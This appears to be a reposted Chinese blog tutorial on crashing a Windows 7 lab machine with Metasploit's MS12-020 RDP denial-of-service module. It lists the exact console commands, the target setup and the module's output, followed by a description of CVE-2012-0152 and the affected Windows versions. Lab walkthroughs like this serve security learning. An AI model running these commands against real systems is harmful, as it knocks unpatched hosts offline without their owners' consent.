如何让一台windows7电脑直接蓝屏死机

简介

今天玩点特别的,让windows7直接蓝屏重启

准备

  • 一台windows7虚拟机
  • metasploit
  • 注意两台电脑要在同一网段上

要求

windows7 必须允许远程桌面连接,就是允许别的电脑远程连接这台电脑

操作

首先两台电脑相互ping一下,看看是不是可以连通
然后打开metasploit
msfconsole
输入
search maxchannel
先查找一下这个模块,然后
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
查看一下配置参数

msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port (TCP)

设置目标ip
set RHOST 192.168.1.108
执行
exploit
输出

msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 192.168.1.108:3389 - 192.168.1.108:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.108:3389 - 192.168.1.108:3389 - 210 bytes sent
[*] 192.168.1.108:3389 - 192.168.1.108:3389 - Checking RDP status...
[+] 192.168.1.108:3389 - 192.168.1.108:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) > 

效果

蓝屏,重启

原理

使用了 CVE-2012-0152 远程桌面协议RDP拒绝访问漏洞(MS12-020)

漏洞描述

BUGTRAQ ID: 52354 CVE ID: CVE-2012-0152 远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。 Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应。

漏洞影响的系统版本

  • Microsoft Windows XP Professional
  • Microsoft Windows XP Home
  • Microsoft Windows Server 2003 Standard Edition
  • Microsoft Windows Server 2003 Enterprise Edition
  • Microsoft Windows Server 2003 Datacenter Edition
  • Microsoft Windows 7
    原文作者:bboysoul
    原文地址: https://www.jianshu.com/p/26223aa219b7
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞